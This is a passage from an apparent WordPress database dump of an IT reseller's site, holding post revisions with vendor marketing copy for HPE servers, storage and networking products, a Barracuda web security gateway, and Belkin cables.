growth at an affordable price. It meets most small- and mid-sized businessesâ€™ needs as well as accelerates your business compute. The ProLiant ML110 Gen10 is a single processor tower form factor that can also be placed in a rack server cabinet using 4.5U of rack space. It includes up to five PCIe slots with room to grow with eight large form factor (LFF) or 16 small form factor (SFF) disk drives. It provides six DDR4 DIMM slots supporting HPE DDR4 SmartMemory with a maximum capacity of 192 GB. The HPE ProLiant ML110 Gen10 server also offers optional redundant fan and redundant power supply to satisfy automatic fail-over needs, making this the ideal server for small- to mid-sized businesses and remote offices and branch offices.\r\n<ul>\r\n 	<li><strong>HPE ProLiant ML350 Gen10 Server</strong></li>\r\n</ul>\r\n<img class=\"alignnone  wp-image-2514\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-ProLiant-ML350-Gen10-Server.png\" alt=\"\" width=\"201\" height=\"150\" />\r\n\r\nHPE ProLiant ML350 Gen10 server delivers a secure dual-socket tower server with performance, expandability, and proven reliability making it the choice for expanding SMBs, remote offices of larger businesses, and enterprise data centers.Â The shorter re-designed rackable chassis with multiple upgrade options provides flexibility that can expand as your business needs grow. It supports 12 Gb/s SAS, NVMe SSD, embedded 4x1GbE NIC with a broad range of graphics and compute options.\r\n\r\n3.Â <strong>HPE Synergy</strong>\r\n\r\nComposable, software-defined infrastructure that speeds application delivery.\r\n<ul>\r\n 	<li><strong>HPE Synergy 12000 Frame</strong></li>\r\n</ul>\r\n<img class=\"alignnone  wp-image-2515\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-Synergy-12000-Frame.png\" alt=\"\" width=\"226\" height=\"170\" />\r\n\r\nHPE Synergy 12000 Frames are uniquely architected as Composable Infrastructure (CI) to match the powerful \'infrastructure-as-code\' capabilities of the HPE intelligent software architecture. Flexible access to compute, storage, and fabric resources allows for use and re-purposing. Linking multiple HPE Synergy Frames efficiently scales the infrastructure with a dedicated single view of the entire management network.\r\n<ul>\r\n 	<li><strong>HPE Synergy D3940 Storage Module</strong></li>\r\n</ul>\r\n<img class=\"alignnone  wp-image-2516\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-Synergy-D3940-Storage-Module.png\" alt=\"\" width=\"222\" height=\"166\" />\r\n\r\nThe HPE Synergy D3940 Storage Module provides a fluid pool of storage resources for the Composable Infrastructure. Additional capacity for compute modules is easily provisioned and intelligently managed with integrated data services for availability and protection. The 40 SFF drive bays per storage module can be populated with 12 G SAS or 6 G SATA drives. Expand up to 4 storage modules in a single Synergy 12000 Frame for a total of 200 drives.\r\n<h2>DATA STORAGE</h2>\r\nFlash storage-integrated, built-for-the-cloud data protection that delivers unparalleled backup, archive and disaster recovery for your enterprise apps.\r\n<ul>\r\n 	<li><strong>HPE StoreOnce Systems</strong></li>\r\n</ul>\r\n<img class=\"alignnone  wp-image-2517\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-StoreOnce-Systems.png\" alt=\"\" width=\"208\" height=\"156\" />\r\n\r\nHPE StoreOnce Systems with StoreOnce Catalyst provide a single, high-performance backup architecture that spans the entire enterprise. You can reduce the amount of backup data you need to store by 95% and choose between powerful dedicated appliances for larger offices and data centers, and flexible virtual appliances for smaller and remote offices. Industry leading backup and restore speeds mean that you can meet shrinking backup windows and recovery SLAs. StoreOnce Catalyst prevents exposure of backup copies to ransomware.\r\n<ul>\r\n 	<li><strong>HPE 3PAR StoreServ 8000 Storage</strong></li>\r\n</ul>\r\n<img class=\"alignnone  wp-image-2518\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-3PAR-StoreServ-8000-Storage.png\" alt=\"\" width=\"208\" height=\"156\" />\r\n\r\nHPE 3PAR StoreServ 8000 Storage, with the lowest all-flash starting price, delivers the performance advantages of a purpose-built, flash-optimized architecture without compromising resiliency, data services, or data mobility. Unlike other purpose-built flash arrays, 3PAR StoreServ 8000 doesnâ€™t require you to introduce an entirely new architecture to achieve flash-optimized performance. With unmatched versatility, performance, and density, HPE 3PAR StoreServ 8000 Storage has you covered with unified storage of block &amp; file protocols, application managed data protection and simplified fabric zoning along with SAN diagnostics.\r\n<ul>\r\n 	<li><strong>HPE 3PAR StoreServ 9000 Storage</strong></li>\r\n</ul>\r\n<img class=\"alignnone  wp-image-2519\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-3PAR-StoreServ-9000-Storage.png\" alt=\"\" width=\"189\" height=\"142\" />\r\n\r\nHPE 3PAR StoreServ 9000 Storage helps you consolidate primary storage workloads â€“ for file and block -- onto an enterprise-class flash array without compromising performance, scalability, data services, or resiliency. This HPE 3PAR 9000 Storage is based on the proven HPE 3PAR architecture and is purpose built for all-flash consolidation, delivering the performance, simplicity and agility needed to support your hybrid IT environment. Whether your applications are virtualized, containerized, or traditional, the HPE 3PAR StoreServ 9000 Storage offers you a solution that can deliver improved business results.\r\n<h2>NETWORKING</h2>\r\n<ol>\r\n 	<li><strong>Router</strong></li>\r\n</ol>\r\nNavigate more devices and simplify complex networks with intelligent management of open standards routing.\r\n<ul>\r\n 	<li><strong>HPE FLexNetwork MSR95x Router Series</strong></li>\r\n</ul>\r\n<img class=\"alignnone  wp-image-2520\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-FLexNetwork-MSR95x-Router-Series.png\" alt=\"\" width=\"227\" height=\"171\" />\r\n\r\nHPE MSR95x Router Series delivers high-performance, small branch routing in a single, cost-optimized form factor. Featuring integrated routing, switching, wireless, security, and voice with no additional licensing, boost your service delivery while simplifying the management of the corporate WAN. This series is flexible to deploy, with Zero Touch Provisioning and WAN options with LTE connectivity. With Comware v7 and fiber connections, the MSR95x also brings the performance and advanced services available on modular routers, such as IPS and high encryption, to a fixed port form factor.\r\n<ul>\r\n 	<li><strong>Alcatel-Lucent 7750 Service Router Series</strong></li>\r\n</ul>\r\n<img class=\"alignnone  wp-image-2521\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Alcatel-Lucent-7750-Service-Router-Series.png\" alt=\"\" width=\"229\" height=\"171\" />\r\n\r\nThe Alcatel-Lucent 7750 Service Router (SR) is a high-performance, multiservice, edge router designed for the concurrent support of advanced end user, business and mobile services on a common IP edge platform. Leveraging the Alcatel-Lucent in-house 400 Gb/s FP3 silicon technology, the 7750 SR enables a wide range of IP services for large enterprises and operators with exceptional performance, scale and service intelligence requirements. The 7750 SR utilizes the Alcatel-Lucent Service Router Operating System (SR OS) and supports service-aware management to enhance operational efficiency.\r\n<ul>\r\n 	<li><strong>HPE FlexNetwork MSR93x Router Series</strong></li>\r\n</ul>\r\n<img class=\"alignnone  wp-image-2522\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-FlexNetwork-MSR93x-Router-Series.png\" alt=\"\" width=\"208\" height=\"156\" />\r\n\r\nHPE MSR93x Router Series delivers a high-performance small-branch router providing integrated routing, switching, security, SIP, 802.11n WLAN connectivity, and 4G LTE/3G in a single unit. With its Converged Infrastructure, it enables faster time to service and enhanced performance while simplifying your network through a single management screen and zero-touch deployment. The MSR93x increases flexibility and agility, delivering extensive connectivity capabilities in a compact, fixed form factor. The MSR93x is based on open standards for seamless integration within small-branch deployment.\r\n\r\n2.Â <strong>Switches</strong>\r\n<ul>\r\n 	<li><strong>HPE Altoline 6921 48SFP+ 6QSFP+ x86 ONIE AC Back-to-Front Switch</strong></li>\r\n</ul>\r\n<img class=\"alignnone  wp-image-2523\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-Altoline-6921-48SFP-6QSFP-x86-ONIE-AC-Back-to-Front-Switch.png\" alt=\"\" width=\"204\" height=\"153\" />\r\n\r\nThe HPE Altoline 6921 Switch Series is an x86-based OCP certified, open-networking, disaggregated family of low-latency 10GbE data center switches in a 1U form factor. Perfect for deployment in web-scale environments as a 10GbE server access switch; optimized for data center hot/cold aisle deployments with reversible airflow. Hardware support for VXLAN is ideal for deployment in multi-tenancy and overlay environments.\r\n<ul>\r\n 	<li><strong>HPE Altoline 6960 32QSFP28 x86 ONIE AC Front-to-Back Switch</strong></li>\r\n</ul>\r\n<img class=\"alignnone  wp-image-2524\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-Altoline-6960-32QSFP28-x86-ONIE-AC-Front-to-Back-Switch.png\" alt=\"\" width=\"212\" height=\"159\" />\r\n\r\nHPE Altoline 6960 Switch Series is an open-networking, disaggregated family of low latency 100/50/25GbE data center switches in a 1U form factor. Perfect for deployment in data center environments as 25GbE server access, or 100/50GbE spine switches. It is optimized for data center hot/cold aisle deployments with reversible airflow. The hardware support for VXLAN makes the Altoline 6960 ideal for deployment in multi-tenancy and overlay environments.\r\n\r\nTo discover more, please click the button below or contact us to discuss your needs.\r\n\r\n[maxbutton id=\"1\" ]','HPE','','inherit','closed','closed','','1529-revision-v1','','','2018-12-18 23:42:42','2018-12-18 15:42:42','',1529,'https://bintara.com.my/blog/2018/12/18/1529-revision-v1/',0,'revision','',0),(2327,1,'2018-12-18 10:10:12','2018-12-18 02:10:12','<h2>SERVER AND SYSTEM</h2>\r\n<ol>\r\n 	<li><strong>Rack Servers</strong></li>\r\n</ol>\r\nRack-optimized servers that modernize your data center by delivering performance, resiliency, and scalability for core business-to-business-critical workloads.\r\n<ul>\r\n 	<li><strong>HPE ProLiant DL325 Gen10 Server</strong></li>\r\n</ul>\r\n<img class=\"\" src=\"https://h50003.www5.hpe.com/digmedialib/prodimg/lowres/i00050526.png\" alt=\"HPE ProLiant DL325 Gen10 Server Left facing\" width=\"251\" height=\"188\" />\r\n\r\nSecure and versatile single socket (1P) 1U AMD EPYCâ„¢ based platform offers an exceptional balance of processor, memory and I/O for virtualization and data intensive workloads. With up to 32 cores, up to 16 DIMMs, 2 TB memory capacity and support for up to 10 NVMe drives, this server delivers 2P performance with 1P economics.\r\n<ul>\r\n 	<li><strong>HPE ProLiant DL385 Gen10 Server</strong></li>\r\n</ul>\r\n<img class=\"\" src=\"https://h50003.www5.hpe.com/digmedialib/prodimg/lowres/i00032395.png\" alt=\"HPE ProLiant DL385 Gen10 Server Center facing\" width=\"250\" height=\"187\" />\r\n\r\nHewlett Packard Enterprise is extending the worlds most secure industry standard servers to include the HPE ProLiant DL385 Gen10 server, utilizing the AMD EPYC 7000 Series processors. This platform has been designed with the security you need and the flexibility you require to accommodate demanding enterprise workloads. With up to 64 cores, up to 32 DIMMs, or 4 TB memory capacity and support for up to 24 NVMe drives, the HPE ProLiant DL385 Gen10 server delivers a low cost virtual machine (VM) with unprecedented security.\r\n<ul>\r\n 	<li><strong>HPE Apollo 6000 Chassis</strong></li>\r\n</ul>\r\n<img class=\"\" src=\"https://h50003.www5.hpe.com/digmedialib/prodimg/lowres/i00023435.png\" alt=\"HPE Apollo 6000 Chassis Left facing\" width=\"238\" height=\"179\" />\r\n\r\nThe HPE Apollo k6000 Chassis is designed with density optimization and HPC solution integration in mind to address these demands. The new modular, fully integrated, and highly flexible chassis is designed to hold the Hewlett Packard Enterprise Gen10 compute servers to fit your specific HPC workloads. It accommodates up to 24 HPE ProLiant XL230k Gen 10 Server trays, redundant power and cooling, Ethernet and high speed fabric switches to address various HPC workload needs. It is a performance optimized, air-cooled solution that fits in customerâ€™s space limitations. This solution offers outstanding configuration flexibility, simplified administration and rack-scale efficiency that lowers the total cost of ownership (TCO) needed for mass scale HPC deployments.\r\n\r\n2.Â <strong>Tower Servers</strong>\r\n\r\nLower costs, boost productivity and keep your small or midsize business running smoothly with servers that provide the options, tools and support you need.\r\n<ul>\r\n 	<li><strong>HPE ProLiant ML110 Gen10 Server</strong></li>\r\n</ul>\r\n<img class=\"\" src=\"https://h50003.www5.hpe.com/digmedialib/prodimg/lowres/i00028971.png\" alt=\"HPE ProLiant ML110 Gen10 Server Left facing\" width=\"242\" height=\"182\" />\r\n\r\nThe HPE ProLiant ML110 Gen10 server is an enhanced tower with performance, expansion, and growth at an affordable price. It meets most small- and mid-sized businessesâ€™ needs as well as accelerates your business compute. The ProLiant ML110 Gen10 is a single processor tower form factor that can also be placed in a rack server cabinet using 4.5U of rack space. It includes up to five PCIe slots with room to grow with eight large form factor (LFF) or 16 small form factor (SFF) disk drives. It provides six DDR4 DIMM slots supporting HPE DDR4 SmartMemory with a maximum capacity of 192 GB. The HPE ProLiant ML110 Gen10 server also offers optional redundant fan and redundant power supply to satisfy automatic fail-over needs, making this the ideal server for small- to mid-sized businesses and remote offices and branch offices.\r\n<ul>\r\n 	<li><strong>HPE ProLiant ML350 Gen10 Server</strong></li>\r\n</ul>\r\n<img class=\"\" src=\"https://h50003.www5.hpe.com/digmedialib/prodimg/lowres/i00027649.png\" alt=\"HPE ProLiant ML350 Gen10 Server Center facing\" width=\"244\" height=\"183\" />\r\n\r\nHPE ProLiant ML350 Gen10 server delivers a secure dual-socket tower server with performance, expandability, and proven reliability making it the choice for expanding SMBs, remote offices of larger businesses, and enterprise data centers.Â The shorter re-designed rackable chassis with multiple upgrade options provides flexibility that can expand as your business needs grow. It supports 12 Gb/s SAS, NVMe SSD, embedded 4x1GbE NIC with a broad range of graphics and compute options.\r\n\r\n3.Â <strong>HPE Synergy</strong>\r\n\r\nComposable, software-defined infrastructure that speeds application delivery.\r\n<ul>\r\n 	<li><strong>HPE Synergy 12000 Frame</strong></li>\r\n</ul>\r\n<img class=\"\" src=\"https://h50003.www5.hpe.com/digmedialib/prodimg/lowres/c04882260.png\" alt=\"HPE Synergy 12000 Frame Left facing\" width=\"244\" height=\"183\" />\r\n\r\n&nbsp;\r\n\r\nHPE Synergy 12000 Frames are uniquely architected as Composable Infrastructure (CI) to match the powerful \'infrastructure-as-code\' capabilities of the HPE intelligent software architecture. Flexible access to compute, storage, and fabric resources allows for use and re-purposing. Linking multiple HPE Synergy Frames efficiently scales the infrastructure with a dedicated single view of the entire management network.\r\n<ul>\r\n 	<li><strong>HPE Synergy D3940 Storage Module</strong></li>\r\n</ul>\r\n<img class=\"\" src=\"https://h50003.www5.hpe.com/digmedialib/prodimg/lowres/c04882827.png\" alt=\"HPE Synergy D3940 Storage Module Left facing\" width=\"241\" height=\"181\" />\r\n\r\nThe HPE Synergy D3940 Storage Module provides a fluid pool of storage resources for the Composable Infrastructure. Additional capacity for compute modules is easily provisioned and intelligently managed with integrated data services for availability and protection. The 40 SFF drive bays per storage module can be populated with 12 G SAS or 6 G SATA drives. Expand up to 4 storage modules in a single Synergy 12000 Frame for a total of 200 drives.\r\n<h2>DATA STORAGE</h2>\r\nFlash storage-integrated, built-for-the-cloud data protection that delivers unparalleled backup, archive and disaster recovery for your enterprise apps.\r\n<ul>\r\n 	<li><strong>HPE StoreOnce Systems</strong></li>\r\n</ul>\r\n<img class=\"\" src=\"https://h50003.www5.hpe.com/digmedialib/prodimg/lowres/i00061047.png\" alt=\"HPE StoreOnce Systems Right facing\" width=\"242\" height=\"181\" />\r\n\r\nHPE StoreOnce Systems with StoreOnce Catalyst provide a single, high-performance backup architecture that spans the entire enterprise. You can reduce the amount of backup data you need to store by 95% and choose between powerful dedicated appliances for larger offices and data centers, and flexible virtual appliances for smaller and remote offices. Industry leading backup and restore speeds mean that you can meet shrinking backup windows and recovery SLAs. StoreOnce Catalyst prevents exposure of backup copies to ransomware.\r\n<ul>\r\n 	<li><strong>HPE 3PAR StoreServ 8000 Storage</strong></li>\r\n</ul>\r\n<img class=\"\" src=\"https://h50003.www5.hpe.com/digmedialib/prodimg/lowres/c04778054.png\" alt=\"HPE 3PAR StoreServ 8000 Storage Right facing\" width=\"257\" height=\"193\" />\r\n\r\nHPE 3PAR StoreServ 8000 Storage, with the lowest all-flash starting price, delivers the performance advantages of a purpose-built, flash-optimized architecture without compromising resiliency, data services, or data mobility. Unlike other purpose-built flash arrays, 3PAR StoreServ 8000 doesnâ€™t require you to introduce an entirely new architecture to achieve flash-optimized performance. With unmatched versatility, performance, and density, HPE 3PAR StoreServ 8000 Storage has you covered with unified storage of block &amp; file protocols, application managed data protection and simplified fabric zoning along with SAN diagnostics.\r\n<ul>\r\n 	<li><strong>HPE 3PAR StoreServ 9000 Storage</strong></li>\r\n</ul>\r\n<img class=\"\" src=\"https://h50003.www5.hpe.com/digmedialib/prodimg/lowres/i00061527.png\" alt=\"HPE 3PAR StoreServ 9000 Storage Left facing\" width=\"240\" height=\"180\" />\r\n\r\nHPE 3PAR StoreServ 9000 Storage helps you consolidate primary storage workloads â€“ for file and block -- onto an enterprise-class flash array without compromising performance, scalability, data services, or resiliency. This HPE 3PAR 9000 Storage is based on the proven HPE 3PAR architecture and is purpose built for all-flash consolidation, delivering the performance, simplicity and agility needed to support your hybrid IT environment. Whether your applications are virtualized, containerized, or traditional, the HPE 3PAR StoreServ 9000 Storage offers you a solution that can deliver improved business results.\r\n<h2>NETWORKING</h2>\r\n<ol>\r\n 	<li><strong>Router</strong></li>\r\n</ol>\r\nNavigate more devices and simplify complex networks with intelligent management of open standards routing.\r\n<ul>\r\n 	<li><strong>HPE FLexNetwork MSR95x Router Series</strong></li>\r\n</ul>\r\n<img class=\"\" src=\"https://h50003.www5.hpe.com/digmedialib/prodimg/lowres/i00003504.png\" alt=\"HPE FLexNetwork MSR95x Router Series Center facing\" width=\"242\" height=\"182\" />\r\n\r\nHPE MSR95x Router Series delivers high-performance, small branch routing in a single, cost-optimized form factor. Featuring integrated routing, switching, wireless, security, and voice with no additional licensing, boost your service delivery while simplifying the management of the corporate WAN. This series is flexible to deploy, with Zero Touch Provisioning and WAN options with LTE connectivity. With Comware v7 and fiber connections, the MSR95x also brings the performance and advanced services available on modular routers, such as IPS and high encryption, to a fixed port form factor.\r\n<ul>\r\n 	<li><strong>Alcatel-Lucent 7750 Service Router Series</strong></li>\r\n</ul>\r\n<img class=\"\" src=\"https://h50003.www5.hpe.com/digmedialib/prodimg/lowres/c04728986.png\" alt=\"Alcatel-Lucent 7750 Service Router Series Center facing\" width=\"239\" height=\"179\" />\r\n\r\nThe Alcatel-Lucent 7750 Service Router (SR) is a high-performance, multiservice, edge router designed for the concurrent support of advanced end user, business and mobile services on a common IP edge platform. Leveraging the Alcatel-Lucent in-house 400 Gb/s FP3 silicon technology, the 7750 SR enables a wide range of IP services for large enterprises and operators with exceptional performance, scale and service intelligence requirements. The 7750 SR utilizes the Alcatel-Lucent Service Router Operating System (SR OS) and supports service-aware management to enhance operational efficiency.\r\n<ul>\r\n 	<li><strong>HPE FlexNetwork MSR93x Router Series</strong></li>\r\n</ul>\r\n<img class=\"\" src=\"https://h50003.www5.hpe.com/digmedialib/prodimg/lowres/i00057124.png\" alt=\"HPE FlexNetwork MSR93x Router Series Left facing\" width=\"240\" height=\"180\" />\r\n\r\nHPE MSR93x Router Series delivers a high-performance small-branch router providing integrated routing, switching, security, SIP, 802.11n WLAN connectivity, and 4G LTE/3G in a single unit. With its Converged Infrastructure, it enables faster time to service and enhanced performance while simplifying your network through a single management screen and zero-touch deployment. The MSR93x increases flexibility and agility, delivering extensive connectivity capabilities in a compact, fixed form factor. The MSR93x is based on open standards for seamless integration within small-branch deployment.\r\n\r\n2.Â <strong>Switches</strong>\r\n<ul>\r\n 	<li><strong>HPE Altoline 6921 48SFP+ 6QSFP+ x86 ONIE AC Back-to-Front Switch</strong></li>\r\n</ul>\r\n<img class=\"\" src=\"https://h50003.www5.hpe.com/digmedialib/prodimg/lowres/c05253791.png\" alt=\"HPE Altoline 6921 48SFP+ 6QSFP+ x86 ONIE AC Back-to-Front Switch Left facing\" width=\"240\" height=\"180\" />\r\n\r\nThe HPE Altoline 6921 Switch Series is an x86-based OCP certified, open-networking, disaggregated family of low-latency 10GbE data center switches in a 1U form factor. Perfect for deployment in web-scale environments as a 10GbE server access switch; optimized for data center hot/cold aisle deployments with reversible airflow. Hardware support for VXLAN is ideal for deployment in multi-tenancy and overlay environments.\r\n<ul>\r\n 	<li><strong>HPE Altoline 6960 32QSFP28 x86 ONIE AC Front-to-Back Switch</strong></li>\r\n</ul>\r\n<img class=\"\" src=\"https://h50003.www5.hpe.com/digmedialib/prodimg/lowres/c05085311.png\" alt=\"HPE Altoline 6960 32QSFP28 x86 ONIE AC Front-to-Back Switch Left facing\" width=\"240\" height=\"180\" />\r\n\r\nHPE Altoline 6960 Switch Series is an open-networking, disaggregated family of low latency 100/50/25GbE data center switches in a 1U form factor. Perfect for deployment in data center environments as 25GbE server access, or 100/50GbE spine switches. It is optimized for data center hot/cold aisle deployments with reversible airflow. The hardware support for VXLAN makes the Altoline 6960 ideal for deployment in multi-tenancy and overlay environments.\r\n\r\nTo discover more, please click the button below or contact us to discuss your needs.\r\n\r\n[maxbutton id=\"1\" ]','HPE','','inherit','closed','closed','','1529-revision-v1','','','2018-12-18 10:10:12','2018-12-18 02:10:12','',1529,'https://bintara.com.my/blog/2018/12/18/1529-revision-v1/',0,'revision','',0),(2329,1,'2018-12-18 10:26:51','2018-12-18 02:26:51','','cq5dam.web.372.372','','inherit','closed','closed','','cq5dam-web-372-372','','','2018-12-18 10:26:51','2018-12-18 02:26:51','',1446,'https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372.jpeg',0,'attachment','image/jpeg',0),(2330,1,'2018-12-18 10:27:17','2018-12-18 02:27:17','','cq5dam.web.1000.1000','','inherit','closed','closed','','cq5dam-web-1000-1000','','','2018-12-18 10:27:17','2018-12-18 02:27:17','',1446,'https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.1000.1000.jpeg',0,'attachment','image/jpeg',0),(2331,1,'2018-12-18 10:27:47','2018-12-18 02:27:47','','372','','inherit','closed','closed','','372','','','2018-12-18 10:27:47','2018-12-18 02:27:47','',1446,'https://bintara.com.my/wp-content/uploads/2018/12/372.png',0,'attachment','image/png',0),(2412,1,'2018-12-18 19:56:16','2018-12-18 11:56:16','<h2>Filters Content, Malware, Social Media and Rogue App Threats</h2>\r\nThe Barracuda Web Security Gateway lets organizations benefit from online applications and tools without exposure to web-borne malware and viruses, lost user productivity, and misused bandwidth. As a comprehensive solution for web security and management, it unites award-winning spyware, malware, and virus protection with a powerful policy and reporting engine. Advanced features ensure that organizations adapt to emerging requirements like social-network regulation, remote filtering, and visibility into SSL-encrypted traffic.\r\n\r\nUnlimited remote user licenses are included to enforce content and access policies for mobile and desktop devices outside of the corporate network. The Barracuda Web Security Gateway is also available as a virtual appliance.\r\n<h2>Enforce Corporate Policies</h2>\r\n<img class=\"alignnone  wp-image-2408\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ENFORCE-CORPORATE-POLICIES.png\" alt=\"\" width=\"268\" height=\"244\" />\r\n\r\nIncrease productivity, regulate bandwidth usage, and prevent risky behavior by enforcing granular policies on user activities. The Barracuda Web Security Gateway can control access to web sites, applications, and Web 2.0 platforms based on users, groups, time, bandwidth, and other criteria. SSL-filtering and inspection capabilities provide policy enforcement on social-media and search platforms that are otherwise obfuscated.\r\n<h2>Protect Against Web-Based Threats</h2>\r\n<img class=\"alignnone  wp-image-2409\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Protect-Against-Web-Based-Threats.png\" alt=\"\" width=\"326\" height=\"179\" />\r\n\r\nKeep networks and users safe by blocking spyware downloads, preventing viruses, and restricting requests to malicious websites by leveraging intelligence from thousands of collection points worldwide. Our award-winning antivirus and anti-spyware technologies combine preventive, proactive, and reactive measures to deliver industry-leading content filtering and malware protection.\r\n<h2>Monitor Network and User Activity</h2>\r\n<img class=\"alignnone  wp-image-2407\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/MONITOR-NETWORK-AND-USER-ACTIVITY.png\" alt=\"\" width=\"283\" height=\"230\" />\r\n\r\nGain complete insight into user activity and network threats via an intuitive dashboard and integrated reporting. This clear visibility lets administrators create effective policies and generate proactive alerts to properly respond to threats.\r\n\r\nIn addition to powerful on-board reporting, you can also deploy a Barracuda Reporting Server.\r\n\r\nThe Barracuda Reporting Server is a powerful platform that enables unified reporting for Barracuda Web Security Gateways. Designed to meet the demands of reporting on increasing amounts of user and security data, the Barracuda Reporting Server generates accurate, customizable reports in a fraction of the time that it takes built-in reporting engines, while also enabling aggregated reports for multiple connected devices.\r\n<h2>Secure Laptops and Mobile Devices</h2>\r\n<img class=\"alignnone  wp-image-2410\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/SECURE-LAPTOPS-AND-MOBILE-DEVICES.png\" alt=\"\" width=\"291\" height=\"227\" />\r\n\r\nExtend security and policies to remote users.Â  With the Barracuda Web Security Agent and the Barracuda Safe Browser, traffic from remote clients can be filtered with the same policies set for on-network users.\r\n<h2>Simplify Management</h2>\r\n<img class=\"alignnone  wp-image-2411\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/SIMPLIFY-MANAGEMENT.png\" alt=\"\" width=\"245\" height=\"237\" />\r\n\r\nCentrally manage the Barracuda Web Security Gateway through the cloud. Configurations on the Barracuda Web Security Gateway are simple and easy-to-deploy ensuring customized network protection is in place in a matter of minutes.\r\n\r\n<img class=\"categoryImage dataImage\" src=\"https://www.barracuda.com/assets/images/common/data_protection.svg\" alt=\"Barracuda Data Protection Icon\" width=\"21\" height=\"24\" />Â  <strong>Data Protection</strong>\r\n\r\nBarracuda\'s all-in-one approach to data protection makes it easier than ever to protect your business from data loss and theft. Data can be backed up to any location including the public cloud -- eliminating the need to purchase and manage backup solutions from multiple vendors. You can even back up your cloud-based Office 365 data such as emails. All backed up data is replicated to the secure Barracuda cloud with unlimited storage.\r\n\r\nTo discover more, please click the button below or contact us to discuss your needs.\r\n\r\n[maxbutton id=\"1\" ]','Barracuda','','inherit','closed','closed','','1445-revision-v1','','','2018-12-18 19:56:16','2018-12-18 11:56:16','',1445,'https://bintara.com.my/blog/2018/12/18/1445-revision-v1/',0,'revision','',0),(2332,1,'2018-12-18 10:28:06','2018-12-18 02:28:06','','cq5dam.web.372.372 (1)','','inherit','closed','closed','','cq5dam-web-372-372-1','','','2018-12-18 10:28:06','2018-12-18 02:28:06','',1446,'https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-1.jpeg',0,'attachment','image/jpeg',0),(2333,1,'2018-12-18 10:29:14','2018-12-18 02:29:14','<h3>THE BELKIN DIFFERENCE</h3>\r\n<h4>Innovation, with quality at its core</h4>\r\nFor 35 years, Belkin has been creating products that simplify your life and empower you to fully leverage technology. The Belkin Difference ensures that every product is thoughtfully engineered, made of the highest-quality materials and thoroughly tested before making its way to you.\r\n<h4 class=\"white\">Global leader in tech.</h4>\r\n\r\n<p>With two products sold every second across 50 countries, we are the leader in cables and connectivity and the #1 third-party maker of wireless charging accessories.</p>\r\n\r\n</div>\r\n<h4>Always looking to the future</h4>\r\nTechnology is constantly evolving. We combine extensive research and development with more than three decades of experience anticipating user needs to make sure weâ€™re ready and youâ€™re covered, no matter what the future holds.\r\n<h4>An unwavering commitment to earning your trust.</h4>\r\nOur rigorous testing and end-to-end control of the manufacturing process allows us to ensure the highest standards are met. We stand behind the quality and safety of our work â€“ thatâ€™s why we back our products with robust warranties.\r\n<h4>Unmatched performance, every time</h4>\r\nWe know you depend on our products, and we take this responsibility very seriously. Our above-and-beyond testing ensures we deliver supremely reliable quality you can always count on.\r\n<h4>We believe good design matters.</h4>\r\nThe Belkin team in Los Angeles, California thoughtfully designs every product to be innovative, dependable and easy to use. This masterful attention to detail has earned us over 130 awards, including more than 30 CES Innovation Awards and nearly 50 International Design Excellence Awards.\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"150\"><img class=\"alignnone size-full wp-image-2329\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372.jpeg\" alt=\"\" width=\"372\" height=\"372\" />\r\n\r\n3.1 USB-A to USB-Câ„¢ Cableï¼ˆUSB Type-Câ„¢ï¼‰</td>\r\n<td width=\"150\"><img class=\"alignnone size-full wp-image-2330\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.1000.1000.jpeg\" alt=\"\" width=\"1000\" height=\"1000\" />\r\n\r\nUltra HD High Speed HDMIÂ® Cable</td>\r\n<td width=\"150\"><img class=\"alignnone size-full wp-image-2331\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/372.png\" alt=\"\" width=\"372\" height=\"372\" />\r\n\r\nGold-Plated High-Speed HDMI Cable with Ethernet 4K/Ultra HD Compatible</td>\r\n<td width=\"150\"><img class=\"alignnone size-full wp-image-2332\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-1.jpeg\" alt=\"\" width=\"372\" height=\"372\" />\r\n\r\nMini DisplayPortTM to VGA</td>\r\n</tr>\r\n<tr>\r\n<td width=\"150\"></td>\r\n<td width=\"150\"></td>\r\n<td width=\"150\"></td>\r\n<td width=\"150\"></td>\r\n</tr>\r\n<tr>\r\n<td width=\"150\"></td>\r\n<td width=\"150\"></td>\r\n<td width=\"150\"></td>\r\n<td width=\"150\"></td>\r\n</tr>\r\n<tr>\r\n<td width=\"150\"></td>\r\n<td width=\"150\"></td>\r\n<td width=\"150\"></td>\r\n<td width=\"150\"></td>\r\n</tr>\r\n<tr>\r\n<td width=\"150\"></td>\r\n<td width=\"150\"></td>\r\n<td width=\"150\"></td>\r\n<td width=\"150\"></td>\r\n</tr>\r\n</tbody>\r\n</table>','Belkin','','inherit','closed','closed','','1446-revision-v1','','','2018-12-18 10:29:14','2018-12-18 02:29:14','',1446,'https://bintara.com.my/blog/2018/12/18/1446-revision-v1/',0,'revision','',0),(2334,1,'2018-12-18 10:38:55','2018-12-18 02:38:55','','cq5dam.web.372.372 (2)','','inherit','closed','closed','','cq5dam-web-372-372-2','','','2018-12-18 10:38:55','2018-12-18 02:38:55','',1446,'https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-2.jpeg',0,'attachment','image/jpeg',0),(2335,1,'2018-12-18 10:39:45','2018-12-18 02:39:45','','cq5dam.web.372.372 